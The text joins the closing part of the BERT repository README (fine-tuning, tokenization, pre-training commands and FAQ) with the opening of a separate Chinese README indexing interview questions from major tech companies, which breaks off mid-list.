--max_seq_length=384 \ --doc_stride=128 \ --output_dir=gs://some_bucket/squad_large/ \ --use_tpu=True \ --tpu_name=$TPU_NAME \ --version_2_with_negative=True ``` We assume you have copied everything from the output directory to a local directory called ./squad/. The initial dev set predictions will be at ./squad/predictions.json and the differences between the score of no answer ("") and the best non-null answer for each question will be in the file ./squad/null_odds.json Run this script to tune a threshold for predicting null versus non-null answers: python $SQUAD_DIR/evaluate-v2.0.py $SQUAD_DIR/dev-v2.0.json ./squad/predictions.json --na-prob-file ./squad/null_odds.json Assume the script outputs "best_f1_thresh" THRESH. (Typical values are between -1.0 and -5.0). You can now re-run the model to generate predictions with the derived threshold or alternatively you can extract the appropriate answers from ./squad/nbest_predictions.json. ```shell python run_squad.py \ --vocab_file=$BERT_LARGE_DIR/vocab.txt \ --bert_config_file=$BERT_LARGE_DIR/bert_config.json \ --init_checkpoint=$BERT_LARGE_DIR/bert_model.ckpt \ --do_train=False \ --train_file=$SQUAD_DIR/train-v2.0.json \ --do_predict=True \ --predict_file=$SQUAD_DIR/dev-v2.0.json \ --train_batch_size=24 \ --learning_rate=3e-5 \ --num_train_epochs=2.0 \ --max_seq_length=384 \ --doc_stride=128 \ --output_dir=gs://some_bucket/squad_large/ \ --use_tpu=True \ --tpu_name=$TPU_NAME \ --version_2_with_negative=True \ --null_score_diff_threshold=$THRESH ``` ### Out-of-memory issues All experiments in the paper were fine-tuned on a Cloud TPU, which has 64GB of device RAM. Therefore, when using a GPU with 12GB - 16GB of RAM, you are likely to encounter out-of-memory issues if you use the same hyperparameters described in the paper. The factors that affect memory usage are: * **`max_seq_length`**: The released models were trained with sequence lengths up to 512, but you can fine-tune with a shorter max sequence length to save substantial memory. This is controlled by the `max_seq_length` flag in our example code. * **`train_batch_size`**: The memory usage is also directly proportional to the batch size. * **Model type, `BERT-Base` vs. `BERT-Large`**: The `BERT-Large` model requires significantly more memory than `BERT-Base`. * **Optimizer**: The default optimizer for BERT is Adam, which requires a lot of extra memory to store the `m` and `v` vectors. Switching to a more memory efficient optimizer can reduce memory usage, but can also affect the results. We have not experimented with other optimizers for fine-tuning. Using the default training scripts (`run_classifier.py` and `run_squad.py`), we benchmarked the maximum batch size on single Titan X GPU (12GB RAM) with TensorFlow 1.11.0: System | Seq Length | Max Batch Size ------------ | ---------- | -------------- `BERT-Base` | 64 | 64 ... | 128 | 32 ... | 256 | 16 ... | 320 | 14 ... | 384 | 12 ... | 512 | 6 `BERT-Large` | 64 | 12 ... | 128 | 6 ... | 256 | 2 ... | 320 | 1 ... | 384 | 0 ... | 512 | 0 Unfortunately, these max batch sizes for `BERT-Large` are so small that they will actually harm the model accuracy, regardless of the learning rate used. We are working on adding code to this repository which will allow much larger effective batch sizes to be used on the GPU. The code will be based on one (or both) of the following techniques: * **Gradient accumulation**: The samples in a minibatch are typically independent with respect to gradient computation (excluding batch normalization, which is not used here). This means that the gradients of multiple smaller minibatches can be accumulated before performing the weight update, and this will be exactly equivalent to a single larger update. * [**Gradient checkpointing**](https://github.com/openai/gradient-checkpointing): The major use of GPU/TPU memory during DNN training is caching the intermediate activations in the forward pass that are necessary for efficient computation in the backward pass. "Gradient checkpointing" trades memory for compute time by re-computing the activations in an intelligent way. **However, this is not implemented in the current release.** ## Using BERT to extract fixed feature vectors (like ELMo) In certain cases, rather than fine-tuning the entire pre-trained model end-to-end, it can be beneficial to obtained *pre-trained contextual embeddings*, which are fixed contextual representations of each input token generated from the hidden layers of the pre-trained model. This should also mitigate most of the out-of-memory issues. As an example, we include the script `extract_features.py` which can be used like this: ```shell # Sentence A and Sentence B are separated by the ||| delimiter for sentence # pair tasks like question answering and entailment. # For single sentence inputs, put one sentence per line and DON'T use the # delimiter. echo 'Who was Jim Henson ? ||| Jim Henson was a puppeteer' > /tmp/input.txt python extract_features.py \ --input_file=/tmp/input.txt \ --output_file=/tmp/output.jsonl \ --vocab_file=$BERT_BASE_DIR/vocab.txt \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \ --layers=-1,-2,-3,-4 \ --max_seq_length=128 \ --batch_size=8 ``` This will create a JSON file (one line per line of input) containing the BERT activations from each Transformer layer specified by `layers` (-1 is the final hidden layer of the Transformer, etc.) Note that this script will produce very large output files (by default, around 15kb for every input token). If you need to maintain alignment between the original and tokenized words (for projecting training labels), see the [Tokenization](#tokenization) section below. **Note:** You may see a message like `Could not find trained model in model_dir: /tmp/tmpuB5g5c, running initialization to predict.` This message is expected, it just means that we are using the `init_from_checkpoint()` API rather than the saved model API. If you don't specify a checkpoint or specify an invalid checkpoint, this script will complain. ## Tokenization For sentence-level tasks (or sentence-pair) tasks, tokenization is very simple. Just follow the example code in `run_classifier.py` and `extract_features.py`. The basic procedure for sentence-level tasks is: 1. Instantiate an instance of `tokenizer = tokenization.FullTokenizer` 2. Tokenize the raw text with `tokens = tokenizer.tokenize(raw_text)`. 3. Truncate to the maximum sequence length. (You can use up to 512, but you probably want to use shorter if possible for memory and speed reasons.) 4. Add the `[CLS]` and `[SEP]` tokens in the right place. Word-level and span-level tasks (e.g., SQuAD and NER) are more complex, since you need to maintain alignment between your input text and output text so that you can project your training labels. SQuAD is a particularly complex example because the input labels are *character*-based, and SQuAD paragraphs are often longer than our maximum sequence length. See the code in `run_squad.py` to show how we handle this. Before we describe the general recipe for handling word-level tasks, it's important to understand what exactly our tokenizer is doing. It has three main steps: 1. **Text normalization**: Convert all whitespace characters to spaces, and (for the `Uncased` model) lowercase the input and strip out accent markers. E.g., `John Johanson's, → john johanson's,`. 2. **Punctuation splitting**: Split *all* punctuation characters on both sides (i.e., add whitespace around all punctuation characters). Punctuation characters are defined as (a) Anything with a `P*` Unicode class, (b) any non-letter/number/space ASCII character (e.g., characters like `$` which are technically not punctuation). E.g., `john johanson's, → john johanson ' s ,` 3. **WordPiece tokenization**: Apply whitespace tokenization to the output of the above procedure, and apply [WordPiece](https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/data_generators/text_encoder.py) tokenization to each token separately. (Our implementation is directly based on the one from `tensor2tensor`, which is linked). E.g., `john johanson ' s , → john johan ##son ' s ,` The advantage of this scheme is that it is "compatible" with most existing English tokenizers. For example, imagine that you have a part-of-speech tagging task which looks like this: ``` Input: John Johanson 's house Labels: NNP NNP POS NN ``` The tokenized output will look like this: ``` Tokens: john johan ##son ' s house ``` Crucially, this would be the same output as if the raw text were `John Johanson's house` (with no space before the `'s`). If you have a pre-tokenized representation with word-level annotations, you can simply tokenize each input word independently, and deterministically maintain an original-to-tokenized alignment: ```python ### Input orig_tokens = ["John", "Johanson", "'s", "house"] labels = ["NNP", "NNP", "POS", "NN"] ### Output bert_tokens = [] # Token map will be an int -> int mapping between the `orig_tokens` index and # the `bert_tokens` index. orig_to_tok_map = [] tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=True) bert_tokens.append("[CLS]") for orig_token in orig_tokens: orig_to_tok_map.append(len(bert_tokens)) bert_tokens.extend(tokenizer.tokenize(orig_token)) bert_tokens.append("[SEP]") # bert_tokens == ["[CLS]", "john", "johan", "##son", "'", "s", "house", "[SEP]"] # orig_to_tok_map == [1, 2, 4, 6] ``` Now `orig_to_tok_map` can be used to project `labels` to the tokenized representation. There are common English tokenization schemes which will cause a slight mismatch between how BERT was pre-trained. For example, if your input tokenization splits off contractions like `do n't`, this will cause a mismatch. If it is possible to do so, you should pre-process your data to convert these back to raw-looking text, but if it's not possible, this mismatch is likely not a big deal. ## Pre-training with BERT We are releasing code to do "masked LM" and "next sentence prediction" on an arbitrary text corpus. Note that this is *not* the exact code that was used for the paper (the original code was written in C++, and had some additional complexity), but this code does generate pre-training data as described in the paper. Here's how to run the data generation. The input is a plain text file, with one sentence per line. (It is important that these be actual sentences for the "next sentence prediction" task). Documents are delimited by empty lines. The output is a set of `tf.train.Example`s serialized into `TFRecord` file format. You can perform sentence segmentation with an off-the-shelf NLP toolkit such as [spaCy](https://spacy.io/). The `create_pretraining_data.py` script will concatenate segments until they reach the maximum sequence length to minimize computational waste from padding (see the script for more details). However, you may want to intentionally add a slight amount of noise to your input data (e.g., randomly truncate 2% of input segments) to make it more robust to non-sentential input during fine-tuning. This script stores all of the examples for the entire input file in memory, so for large data files you should shard the input file and call the script multiple times. (You can pass in a file glob to `run_pretraining.py`, e.g., `tf_examples.tf_record*`.) The `max_predictions_per_seq` is the maximum number of masked LM predictions per sequence. You should set this to around `max_seq_length` * `masked_lm_prob` (the script doesn't do that automatically because the exact value needs to be passed to both scripts). ```shell python create_pretraining_data.py \ --input_file=./sample_text.txt \ --output_file=/tmp/tf_examples.tfrecord \ --vocab_file=$BERT_BASE_DIR/vocab.txt \ --do_lower_case=True \ --max_seq_length=128 \ --max_predictions_per_seq=20 \ --masked_lm_prob=0.15 \ --random_seed=12345 \ --dupe_factor=5 ``` Here's how to run the pre-training. Do not include `init_checkpoint` if you are pre-training from scratch. The model configuration (including vocab size) is specified in `bert_config_file`. This demo code only pre-trains for a small number of steps (20), but in practice you will probably want to set `num_train_steps` to 10000 steps or more. The `max_seq_length` and `max_predictions_per_seq` parameters passed to `run_pretraining.py` must be the same as `create_pretraining_data.py`. ```shell python run_pretraining.py \ --input_file=/tmp/tf_examples.tfrecord \ --output_dir=/tmp/pretraining_output \ --do_train=True \ --do_eval=True \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \ --train_batch_size=32 \ --max_seq_length=128 \ --max_predictions_per_seq=20 \ --num_train_steps=20 \ --num_warmup_steps=10 \ --learning_rate=2e-5 ``` This will produce an output like this: ``` ***** Eval results ***** global_step = 20 loss = 0.0979674 masked_lm_accuracy = 0.985479 masked_lm_loss = 0.0979328 next_sentence_accuracy = 1.0 next_sentence_loss = 3.45724e-05 ``` Note that since our `sample_text.txt` file is very small, this example training will overfit that data in only a few steps and produce unrealistically high accuracy numbers. ### Pre-training tips and caveats * **If using your own vocabulary, make sure to change `vocab_size` in `bert_config.json`. If you use a larger vocabulary without changing this, you will likely get NaNs when training on GPU or TPU due to unchecked out-of-bounds access.** * If your task has a large domain-specific corpus available (e.g., "movie reviews" or "scientific papers"), it will likely be beneficial to run additional steps of pre-training on your corpus, starting from the BERT checkpoint. * The learning rate we used in the paper was 1e-4. However, if you are doing additional steps of pre-training starting from an existing BERT checkpoint, you should use a smaller learning rate (e.g., 2e-5). * Current BERT models are English-only, but we do plan to release a multilingual model which has been pre-trained on a lot of languages in the near future (hopefully by the end of November 2018). * Longer sequences are disproportionately expensive because attention is quadratic to the sequence length. In other words, a batch of 64 sequences of length 512 is much more expensive than a batch of 256 sequences of length 128. The fully-connected/convolutional cost is the same, but the attention cost is far greater for the 512-length sequences. Therefore, one good recipe is to pre-train for, say, 90,000 steps with a sequence length of 128 and then for 10,000 additional steps with a sequence length of 512. The very long sequences are mostly needed to learn positional embeddings, which can be learned fairly quickly. Note that this does require generating the data twice with different values of `max_seq_length`. * If you are pre-training from scratch, be prepared that pre-training is computationally expensive, especially on GPUs. If you are pre-training from scratch, our recommended recipe is to pre-train a `BERT-Base` on a single [preemptible Cloud TPU v2](https://cloud.google.com/tpu/docs/pricing), which takes about 2 weeks at a cost of about $500 USD (based on the pricing in October 2018). You will have to scale down the batch size when only training on a single Cloud TPU, compared to what was used in the paper. It is recommended to use the largest batch size that fits into TPU memory. ### Pre-training data We will **not** be able to release the pre-processed datasets used in the paper. For Wikipedia, the recommended pre-processing is to download [the latest dump](https://dumps.wikimedia.org/enwiki/latest/enwiki-latest-pages-articles.xml.bz2), extract the text with [`WikiExtractor.py`](https://github.com/attardi/wikiextractor), and then apply any necessary cleanup to convert it into plain text. Unfortunately the researchers who collected the [BookCorpus](http://yknzhu.wixsite.com/mbweb) no longer have it available for public download. The [Project Guttenberg Dataset](https://web.eecs.umich.edu/~lahiri/gutenberg_dataset.html) is a somewhat smaller (200M word) collection of older books that are public domain. [Common Crawl](http://commoncrawl.org/) is another very large collection of text, but you will likely have to do substantial pre-processing and cleanup to extract a usable corpus for pre-training BERT. ### Learning a new WordPiece vocabulary This repository does not include code for *learning* a new WordPiece vocabulary. The reason is that the code used in the paper was implemented in C++ with dependencies on Google's internal libraries. For English, it is almost always better to just start with our vocabulary and pre-trained models. For learning vocabularies of other languages, there are a number of open source options available. However, keep in mind that these are not compatible with our `tokenization.py` library: * [Google's SentencePiece library](https://github.com/google/sentencepiece) * [tensor2tensor's WordPiece generation script](https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/data_generators/text_encoder_build_subword.py) * [Rico Sennrich's Byte Pair Encoding library](https://github.com/rsennrich/subword-nmt) ## Using BERT in Colab If you want to use BERT with [Colab](https://colab.research.google.com), you can get started with the notebook "[BERT FineTuning with Cloud TPUs](https://colab.research.google.com/github/tensorflow/tpu/blob/master/tools/colab/bert_finetuning_with_cloud_tpus.ipynb)". **At the time of this writing (October 31st, 2018), Colab users can access a Cloud TPU completely for free.** Note: One per user, availability limited, requires a Google Cloud Platform account with storage (although storage may be purchased with free credit for signing up with GCP), and this capability may not longer be available in the future. Click on the BERT Colab that was just linked for more information. ## FAQ #### Is this code compatible with Cloud TPUs? What about GPUs? Yes, all of the code in this repository works out-of-the-box with CPU, GPU, and Cloud TPU. However, GPU training is single-GPU only. #### I am getting out-of-memory errors, what is wrong? See the section on [out-of-memory issues](#out-of-memory-issues) for more information. #### Is there a PyTorch version available? There is no official PyTorch implementation. However, NLP researchers from HuggingFace made a [PyTorch version of BERT available](https://github.com/huggingface/pytorch-pretrained-BERT) which is compatible with our pre-trained checkpoints and is able to reproduce our results. We were not involved in the creation or maintenance of the PyTorch implementation so please direct any questions towards the authors of that repository. #### Is there a Chainer version available? There is no official Chainer implementation. However, Sosuke Kobayashi made a [Chainer version of BERT available](https://github.com/soskek/bert-chainer) which is compatible with our pre-trained checkpoints and is able to reproduce our results. We were not involved in the creation or maintenance of the Chainer implementation so please direct any questions towards the authors of that repository. #### Will models in other languages be released? Yes, we plan to release a multi-lingual BERT model in the near future. We cannot make promises about exactly which languages will be included, but it will likely be a single model which includes *most* of the languages which have a significantly-sized Wikipedia. #### Will models larger than `BERT-Large` be released? So far we have not attempted to train anything larger than `BERT-Large`. It is possible that we will release larger models if we are able to obtain significant improvements. #### What license is this library released under? All code *and* models are released under the Apache 2.0 license. See the `LICENSE` file for more information. #### How do I cite BERT? For now, cite [the Arxiv paper](https://arxiv.org/abs/1810.04805): ``` @article{devlin2018bert, title={BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding}, author={Devlin, Jacob and Chang, Ming-Wei and Lee, Kenton and Toutanova, Kristina}, journal={arXiv preprint arXiv:1810.04805}, year={2018} } ``` If we submit the paper to a conference or journal, we will update the BibTeX. ## Disclaimer This is not an official Google product. ## Contact information For help or issues using BERT, please submit a GitHub issue. For personal communication related to BERT, please contact Jacob Devlin (`[email protected]`), Ming-Wei Chang (`[email protected]`), or Kenton Lee (`[email protected]`).
interview_internal_reference
9fe6c758e98c03c40c8908c39e78ab98a7ab53d6
## 2023年最新总结,阿里,腾讯,百度,美团,头条等技术面试题目,以及答案,专家出题人分析汇总。持续更新中。 * [阿里篇](#1) * [华为篇](#2) * [百度篇](#3) * [腾讯篇](#4) * [美团篇](#5) * [头条篇](#6) * [滴滴篇](#7) * [京东篇](#8) * [MySQL篇](#9) * [Redis篇](#10) * [MongoDB篇](#11) * [Zookeeper篇](#12) * [Nginx篇](#13) * [算法篇](#14) * [内存篇](#15) * [cpu篇](#16) * [磁盘篇](#17) * [网络通信篇](#18) * [安全篇](#19) * [并发篇](#20) <h3 id="1">阿里篇</h3> --- ##### [1.1.1 如何实现一个高效的单向链表逆序输出?](01.阿里篇/1.1.1%20%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%AB%98%E6%95%88%E7%9A%84%E5%8D%95%E5%90%91%E9%93%BE%E8%A1%A8%E9%80%86%E5%BA%8F%E8%BE%93%E5%87%BA%EF%BC%9F.md) ##### [1.1.2 已知sqrt(2)约等于1.414,要求不用数学库,求sqrt(2)精确到小数点后10位](01.阿里篇/1.1.2%20%E5%B7%B2%E7%9F%A5sqrt%282%29%E7%BA%A6%E7%AD%89%E4%BA%8E1.414%EF%BC%8C%E8%A6%81%E6%B1%82%E4%B8%8D%E7%94%A8%E6%95%B0%E5%AD%A6%E5%BA%93%EF%BC%8C%E6%B1%82sqrt%282%29%E7%B2%BE%E7%A1%AE%E5%88%B0%E5%B0%8F%E6%95%B0%E7%82%B9%E5%90%8E10%E4%BD%8D.md) ##### [1.1.3 给定一个二叉搜索树(BST),找到树中第 K 小的节点](01.阿里篇/1.1.3%20%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E4%BA%8C%E5%8F%89%E6%90%9C%E7%B4%A2%E6%A0%91%28BST%29%EF%BC%8C%E6%89%BE%E5%88%B0%E6%A0%91%E4%B8%AD%E7%AC%AC%20K%20%E5%B0%8F%E7%9A%84%E8%8A%82%E7%82%B9.md) ##### [1.1.4 LRU缓存机制](01.阿里篇/1.1.4%20LRU%E7%BC%93%E5%AD%98%E6%9C%BA%E5%88%B6.md) ##### [1.1.5 关于epoll和select的区别,以下哪些说法是正确的](01.阿里篇/1.1.5%20%E5%85%B3%E4%BA%8Eepoll%E5%92%8Cselect%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%8C%E4%BB%A5%E4%B8%8B%E5%93%AA%E4%BA%9B%E8%AF%B4%E6%B3%95%E6%98%AF%E6%AD%A3%E7%A1%AE%E7%9A%84.md) ##### [1.1.6 从innodb的索引结构分析,为什么索引的 key 长度不能太长](01.阿里篇/1.1.6%20%E4%BB%8Einnodb%E7%9A%84%E7%B4%A2%E5%BC%95%E7%BB%93%E6%9E%84%E5%88%86%E6%9E%90%EF%BC%8C%E4%B8%BA%E4%BB%80%E4%B9%88%E7%B4%A2%E5%BC%95%E7%9A%84%20key%20%E9%95%BF%E5%BA%A6%E4%B8%8D%E8%83%BD%E5%A4%AA%E9%95%BF.md) ##### [1.1.7 MySQL的数据如何恢复到任意时间点?](01.阿里篇/1.1.7%20MySQL%E7%9A%84%E6%95%B0%E6%8D%AE%E5%A6%82%E4%BD%95%E6%81%A2%E5%A4%8D%E5%88%B0%E4%BB%BB%E6%84%8F%E6%97%B6%E9%97%B4%E7%82%B9%EF%BC%9F.md) ##### [1.1.8 什么是静态关联?什么是动态关联?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#304-%E4%BB%80%E4%B9%88%E6%98%AF%E9%9D%99%E6%80%81%E5%85%B3%E8%81%94%E4%BB%80%E4%B9%88%E6%98%AF%E5%8A%A8%E6%80%81%E5%85%B3%E8%81%94) ##### [1.1.9 输入 ping IP 后敲回车,发包前会发生什么?](01.阿里篇/1.1.9%20%E8%BE%93%E5%85%A5%20ping%20IP%20%E5%90%8E%E6%95%B2%E5%9B%9E%E8%BD%A6%EF%BC%8C%E5%8F%91%E5%8C%85%E5%89%8D%E4%BC%9A%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### [1.2.0 请解释下为什么鹿晗发布恋情的时候,微博系统会崩溃,如何解决?](01.阿里篇/1.2.0%20%E8%AF%B7%E8%A7%A3%E9%87%8A%E4%B8%8B%E4%B8%BA%E4%BB%80%E4%B9%88%E9%B9%BF%E6%99%97%E5%8F%91%E5%B8%83%E6%81%8B%E6%83%85%E7%9A%84%E6%97%B6%E5%80%99%EF%BC%8C%E5%BE%AE%E5%8D%9A%E7%B3%BB%E7%BB%9F%E4%BC%9A%E5%B4%A9%E6%BA%83%EF%BC%8C%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%EF%BC%9F.md) ##### [1.2.1 现有一批邮件需要发送给订阅顾客,且有一个集群(集群的节点数不定,会动态扩容缩容)来负责具体的邮件发送任务,如何让系统尽快地完成发送?](01.阿里篇/1.2.1%20%E7%8E%B0%E6%9C%89%E4%B8%80%E6%89%B9%E9%82%AE%E4%BB%B6%E9%9C%80%E8%A6%81%E5%8F%91%E9%80%81%E7%BB%99%E8%AE%A2%E9%98%85%E9%A1%BE%E5%AE%A2%EF%BC%8C%E4%B8%94%E6%9C%89%E4%B8%80%E4%B8%AA%E9%9B%86%E7%BE%A4%EF%BC%88%E9%9B%86%E7%BE%A4%E7%9A%84%E8%8A%82%E7%82%B9%E6%95%B0%E4%B8%8D%E5%AE%9A%EF%BC%8C%E4%BC%9A%E5%8A%A8%E6%80%81%E6%89%A9%E5%AE%B9%E7%BC%A9%E5%AE%B9%EF%BC%89%E6%9D%A5%E8%B4%9F%E8%B4%A3%E5%85%B7%E4%BD%93%E7%9A%84%E9%82%AE%E4%BB%B6%E5%8F%91%E9%80%81%E4%BB%BB%E5%8A%A1%EF%BC%8C%E5%A6%82%E4%BD%95%E8%AE%A9%E7%B3%BB%E7%BB%9F%E5%B0%BD%E5%BF%AB%E5%9C%B0%E5%AE%8C%E6%88%90%E5%8F%91%E9%80%81%EF%BC%9F.md) ##### [1.2.2 有一批气象观测站,现需要获取这些站点的观测数据,并存储到 Hive 中。但是气象局只提供了 api 查询,每次只能查询单个观测点。那么如果能够方便快速地获取到所有的观测点的数据?](01.阿里篇/1.2.2%20%E6%9C%89%E4%B8%80%E6%89%B9%E6%B0%94%E8%B1%A1%E8%A7%82%E6%B5%8B%E7%AB%99%EF%BC%8C%E7%8E%B0%E9%9C%80%E8%A6%81%E8%8E%B7%E5%8F%96%E8%BF%99%E4%BA%9B%E7%AB%99%E7%82%B9%E7%9A%84%E8%A7%82%E6%B5%8B%E6%95%B0%E6%8D%AE%EF%BC%8C%E5%B9%B6%E5%AD%98%E5%82%A8%E5%88%B0%20Hive%20%E4%B8%AD%E3%80%82%E4%BD%86%E6%98%AF%E6%B0%94%E8%B1%A1%E5%B1%80%E5%8F%AA%E6%8F%90%E4%BE%9B%E4%BA%86%20api%20%E6%9F%A5%E8%AF%A2%EF%BC%8C%E6%AF%8F%E6%AC%A1%E5%8F%AA%E8%83%BD%E6%9F%A5%E8%AF%A2%E5%8D%95%E4%B8%AA%E8%A7%82%E6%B5%8B%E7%82%B9%E3%80%82%E9%82%A3%E4%B9%88%E5%A6%82%E6%9E%9C%E8%83%BD%E5%A4%9F%E6%96%B9%E4%BE%BF%E5%BF%AB%E9%80%9F%E5%9C%B0%E8%8E%B7%E5%8F%96%E5%88%B0%E6%89%80%E6%9C%89%E7%9A%84%E8%A7%82%E6%B5%8B%E7%82%B9%E7%9A%84%E6%95%B0%E6%8D%AE%EF%BC%9F.md) ##### [1.2.3 如何实现两金额数据相加(最多小数点两位)](01.阿里篇/1.2.3%20%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B8%A4%E9%87%91%E9%A2%9D%E6%95%B0%E6%8D%AE%E7%9B%B8%E5%8A%A0%EF%BC%88%E6%9C%80%E5%A4%9A%E5%B0%8F%E6%95%B0%E7%82%B9%E4%B8%A4%E4%BD%8D%EF%BC%89.md) ##### [1.2.4 关于并行计算的一些基础开放问题](01.阿里篇/1.2.4%20%E5%85%B3%E4%BA%8E%E5%B9%B6%E8%A1%8C%E8%AE%A1%E7%AE%97%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9F%BA%E7%A1%80%E5%BC%80%E6%94%BE%E9%97%AE%E9%A2%98.md) ##### [1.2.5 请计算XILINX公司VU9P芯片的算力相当于多少TOPS,给出计算过程与公式](01.阿里篇/1.2.5%20%E8%AF%B7%E8%AE%A1%E7%AE%97XILINX%E5%85%AC%E5%8F%B8VU9P%E8%8A%AF%E7%89%87%E7%9A%84%E7%AE%97%E5%8A%9B%E7%9B%B8%E5%BD%93%E4%BA%8E%E5%A4%9A%E5%B0%91TOPS%EF%BC%8C%E7%BB%99%E5%87%BA%E8%AE%A1%E7%AE%97%E8%BF%87%E7%A8%8B%E4%B8%8E%E5%85%AC%E5%BC%8F.md) ##### [1.2.6 一颗现代处理器,每秒大概可以执行多少条简单的MOV指令,有哪些主要的影响因素](01.阿里篇/1.2.6%20%E4%B8%80%E9%A2%97%E7%8E%B0%E4%BB%A3%E5%A4%84%E7%90%86%E5%99%A8%EF%BC%8C%E6%AF%8F%E7%A7%92%E5%A4%A7%E6%A6%82%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E5%A4%9A%E5%B0%91%E6%9D%A1%E7%AE%80%E5%8D%95%E7%9A%84MOV%E6%8C%87%E4%BB%A4%EF%BC%8C%E6%9C%89%E5%93%AA%E4%BA%9B%E4%B8%BB%E8%A6%81%E7%9A%84%E5%BD%B1%E5%93%8D%E5%9B%A0%E7%B4%A0.md) ##### [1.2.7 请分析 MaxCompute 产品与分布式技术的关系、当前大数据计算平台类产品的市场现状和发展趋势](01.阿里篇/1.2.7%20%E8%AF%B7%E5%88%86%E6%9E%90%20MaxCompute%20%E4%BA%A7%E5%93%81%E4%B8%8E%E5%88%86%E5%B8%83%E5%BC%8F%E6%8A%80%E6%9C%AF%E7%9A%84%E5%85%B3%E7%B3%BB%E3%80%81%E5%BD%93%E5%89%8D%E5%A4%A7%E6%95%B0%E6%8D%AE%E8%AE%A1%E7%AE%97%E5%B9%B3%E5%8F%B0%E7%B1%BB%E4%BA%A7%E5%93%81%E7%9A%84%E5%B8%82%E5%9C%BA%E7%8E%B0%E7%8A%B6%E5%92%8C%E5%8F%91%E5%B1%95%E8%B6%8B%E5%8A%BF.md) ##### [1.2.8 对大数据平台中的元数据管理是怎么理解的,元数据收集管理体系是怎么样的,会对大数据应用有什么样的影响](01.阿里篇/1.2.8%20%E5%AF%B9%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E4%B8%AD%E7%9A%84%E5%85%83%E6%95%B0%E6%8D%AE%E7%AE%A1%E7%90%86%E6%98%AF%E6%80%8E%E4%B9%88%E7%90%86%E8%A7%A3%E7%9A%84%EF%BC%8C%E5%85%83%E6%95%B0%E6%8D%AE%E6%94%B6%E9%9B%86%E7%AE%A1%E7%90%86%E4%BD%93%E7%B3%BB%E6%98%AF%E6%80%8E%E4%B9%88%E6%A0%B7%E7%9A%84%EF%BC%8C%E4%BC%9A%E5%AF%B9%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BA%94%E7%94%A8%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E5%BD%B1%E5%93%8D.md) ##### [1.2.9 你理解常见如阿里,和友商大数据平台的技术体系差异以及发展趋势和技术瓶颈,在存储和计算两个方面进行概述](01.阿里篇/1.2.9%20%E4%BD%A0%E7%90%86%E8%A7%A3%E5%B8%B8%E8%A7%81%E5%A6%82%E9%98%BF%E9%87%8C%EF%BC%8C%E5%92%8C%E5%8F%8B%E5%95%86%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E7%9A%84%E6%8A%80%E6%9C%AF%E4%BD%93%E7%B3%BB%E5%B7%AE%E5%BC%82%E4%BB%A5%E5%8F%8A%E5%8F%91%E5%B1%95%E8%B6%8B%E5%8A%BF%E5%92%8C%E6%8A%80%E6%9C%AF%E7%93%B6%E9%A2%88%EF%BC%8C%E5%9C%A8%E5%AD%98%E5%82%A8%E5%92%8C%E8%AE%A1%E7%AE%97%E4%B8%A4%E4%B8%AA%E6%96%B9%E9%9D%A2%E8%BF%9B%E8%A1%8C%E6%A6%82%E8%BF%B0.md) ##### [1.3.0 虚函数是如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#305-%E8%99%9A%E5%87%BD%E6%95%B0%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [1.3.1 最大频率栈](01.阿里篇/1.3.1%20%E6%9C%80%E5%A4%A7%E9%A2%91%E7%8E%87%E6%A0%88.md) ##### [1.3.2 给定一个链表,删除链表的倒数第N个节点,并且返回链表的头结点](01.阿里篇/1.3.2%20%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E9%93%BE%E8%A1%A8%EF%BC%8C%E5%88%A0%E9%99%A4%E9%93%BE%E8%A1%A8%E7%9A%84%E5%80%92%E6%95%B0%E7%AC%ACN%E4%B8%AA%E8%8A%82%E7%82%B9%EF%BC%8C%E5%B9%B6%E4%B8%94%E8%BF%94%E5%9B%9E%E9%93%BE%E8%A1%A8%E7%9A%84%E5%A4%B4%E7%BB%93%E7%82%B9.md) ##### [1.3.3 如果让你设计一个通用的、支持各种数据库秒级备份和恢复的系统,你会如何设计](01.阿里篇/1.3.3%20%E5%A6%82%E6%9E%9C%E8%AE%A9%E4%BD%A0%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E9%80%9A%E7%94%A8%E7%9A%84%E3%80%81%E6%94%AF%E6%8C%81%E5%90%84%E7%A7%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E7%A7%92%E7%BA%A7%E5%A4%87%E4%BB%BD%E5%92%8C%E6%81%A2%E5%A4%8D%E7%9A%84%E7%B3%BB%E7%BB%9F%EF%BC%8C%E4%BD%A0%E4%BC%9A%E5%A6%82%E4%BD%95%E8%AE%BE%E8%AE%A1.md) ##### [1.3.4 如果让你来设计一个支持数据库、NOSQL 